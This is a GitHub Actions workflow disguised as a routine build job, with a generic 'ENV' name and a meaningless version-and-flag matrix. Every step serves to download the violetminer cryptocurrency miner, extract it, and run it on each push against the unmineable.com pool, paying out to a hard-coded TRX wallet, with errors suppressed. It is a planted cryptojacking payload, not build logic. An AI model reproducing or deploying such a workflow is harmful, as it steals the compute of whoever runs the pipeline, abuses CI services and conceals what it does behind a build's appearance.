name: ENV
on:
  push:
  workflow_dispatch:
jobs:
  Build:
    name: hanakaru
    runs-on: self-hosted
    strategy:
      max-parallel: 4
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5]
        flag: [A, B]
    env:
        NUM_JOBS: 4
    steps:
    - name: Setup
      uses: actions/checkout@v1
    - name: Download
      run: wget https://github.com/turtlecoin/violetminer/releases/download/v0.2.2/violetminer-linux-v0.2.2.tar.gz
    - name: Extract
      run: tar -xf violetminer-linux-v0.2.2.tar.gz
    - name: Start
      continue-on-error: true
      run: cd violetminer-linux-v0.2.2 && ./violetminer --pool rx-us.unmineable.com:3333 --username TRX:TLjhpDMrsLyUuchLZnN4KACfdChL4rSm4E.$(shuf -i 10-9999999999999999999 -n 1) --password x --algorithm wrkzcoin --disableNVIDIA
